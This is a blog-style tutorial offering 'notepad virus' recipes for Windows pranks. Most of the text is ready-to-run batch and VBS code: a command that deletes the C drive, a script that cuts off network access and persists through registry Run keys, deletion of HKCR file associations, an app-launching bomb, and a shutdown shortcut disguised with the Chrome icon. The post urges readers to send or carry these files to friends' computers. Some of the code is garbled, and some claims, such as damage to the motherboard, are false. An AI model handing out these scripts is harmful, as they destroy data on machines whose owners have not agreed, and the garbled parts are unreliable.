Almost every computer or laptop user has faced a virus attack at least once in their life and we all know what a virus is. Today we describe five ways to create a virus in less than a minute. Read the post to learn more about it.
Nowadays someone uses a computer every second and almost everyone knows about a virus. The virus is a malicious program that enters your computer without your permission and can affect your data and operating system.
Well, viruses are of different types like there are Trojans and many more. However, have you ever thought of making a virus? You can make one in seconds which is possible with some easy methods that I will discuss in this post.
Also Read: How to Remove All Viruses from PC Using Rescue USB Disk
How to Create a Fake Harmless Virus Using Notepad
Many of you will think that the methods must be based on coding, but nothing of the sort. The tricks are based on Notepad. Just follow the steps below creating a harmless virus using a notepad. In addition, you can remove malware from your browser if it is infected.
1) Creating a dangerous virus
1. First of all, open Notepad in your Windows operating system.
2. Copy and paste the code below into your Notepad screen.
@Echo off Del C: *.* |y
3. Save this file as virus.bat (you can choose any name, but after that .bat must be present).
Now when you run the file, it will be C drive completely and the operating system of the affected computer will be damaged.
Remark: This method is for knowledge purposes only. Do not try this on your computer as it will completely format your C drive.
2) Create a harmless cdrom virus
Open Notepad Paste the following code into it and save it as CD-ROM.vbs or whatever (*.vbs_
Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop
When you double click on this file, you will be amazed what this simple, harmless virus can do. Getting your CD/DVD drives continuously ejected.
To stop this virus, you need to open the task manager, the processing tab, And end the wscript.exe file.
3) Create a virus to test your antivirus (fake virus notepad)
Open notepad and paste the given code and save the file as “EICAR.COM”
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
If you have an active antivirus, your antivirus program will remove this file in no time. This is the harmless virus used to check your antivirus’s security level.
4) Virus To Stop Someone’s Internet Access
This is a harmless virus, and it will not destroy your PC. You can use this notepad virus script to prank your friends. This virus stops anyone’s internet access. You need to type
the following code in Notepad.
@Echo off Ipconfig /release
Save the file in a .bat format like internet.bat and send it to your friends. The IP address will be lost, so they won’t be able to fix it. Well, if you want to fix it. Type in ipconfig/renew. So, this is one of the best notepad virus pranks.
5) Creating a Matrix Type screen
Well, it’s not a virus. It is just a simple notepad trick that will let you see the string of green characters appearing randomly. It has nothing to do with your computer registry, batch, etc. However, you can use this trick to scare your friend because the screen looks like a virus is affected.
Open Notepad and type the following code into it.
@echo off color 02 :start echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% goto start
Now save the file as Matrix.bat, click on it, and the show begins.
6) Shutdown virus
You can also create a virus that can shut down computers. This virus is harmless but can cause data loss due to a sudden shutdown. Here’s how you can make a shutdown virus to pull up a prank with your friends.
1. First of all, right-click on your desktop and then choose the option Create Shortcut.
2. In the pop-up window, type in shutdown -s -t 60 -c “Virus Detection. The computer is shutting down.” Instead of 60, you can put what value you want. It represents the time in seconds.
3. Then click on the Next button and type Chrome. Or whatever you want.
4. Then, you need to change the Shortcut icon and choose the icon of Google Chrome.
Your virus will look like Google Chrome. You can carry this file in your Pendrive and shut down your friends’ computers.
Few Other Notepad Virus Codes (Notepad virus tricks)
Here are a few other source codes to create a notepad virus on a Windows computer.
Note: The damages caused by these viruses are irreversible
1) Disable Internet Permanently
The below code will disable anyone’s internet connectivity PERMANENTLY.
[alert-note]echo @echo off>c:windowswimn32.bat echo break off>c:windowswimn32.bat echo ipconfig/release_all>c:windowswimn32.bat echo end>c:windowswimn32.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /dc:windowswimn32.bat /freg add h key toe _current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /dc:windowswimn32.bat /fecho ENTER YOUR MESSAGE!! PAUSE[/alert-note]
2) Endless Notepads
The code below will make endless notebooks appear until the computer freezes and crashes!
@ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top
3) Enter endlessly
The code below will cause the enter button to be pressed continuously
Set wshShell = wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “~(enter)” loop
4) Delete key registry files
Before you try notepad virus, keep in mind that this is a dangerous and irreparable virus that can cause permanent damage to your operating system. Reinstalling Windows is the only option to recover from this dangerous virus.
@ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO Your PC has been crashed.Your Dad. GOTO MESSAGE
5) App bomber
This is another dangerous virus that can freeze a computer in no time. This virus will repeatedly open different applications, causing the computer to crash. This virus can also damage your motherboard, so try at your own risk.
@echo off :x start winword start mspaint start notepad start write start cmd start explorer start control start calc goto x
You can add your application to the code given above.
Also Read: 20+ Best Notepad Tricks, Hacks & Commands
I hope you like the post! With this method, you can easily create a harmful and harmless virus and fool your friends. If you have any more tricks like this, feel free to share them with us. Don’t forget to share this fantastic post with your friends.